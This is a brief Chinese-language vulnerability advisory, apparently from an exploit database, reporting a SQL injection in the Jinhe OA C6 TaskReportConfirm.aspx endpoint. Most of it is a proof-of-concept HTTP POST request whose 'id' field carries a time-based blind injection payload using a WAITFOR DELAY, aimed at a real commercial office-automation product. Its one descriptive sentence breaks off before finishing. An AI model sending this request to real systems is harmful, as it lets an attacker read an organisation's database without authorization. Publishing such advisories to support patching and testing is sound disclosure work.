金和OA-C6 TaskReportConfirm.aspx 存在SQL注入漏洞

日期: 2025-07-10 | 影响软件: 金和OA | POC: 已公开

漏洞描述

金和OA C6 TaskReportConfirm.aspx 接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息

PoC代码

POST /c6/Jhsoft.Web.dailytaskmanage/TaskReportConfirm.aspx/ HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

__EVENTTARGET=xxxx&__EVENTARGUMENT=&__VIEWSTATE=xxxx&txtTaskReportExplain=&chkCallViewer
s=on&hidReportID=0&__VIEWSTATEGENERATOR=xxxxx&id='WAitFor DelaY'0:0:5'&"

相关漏洞推荐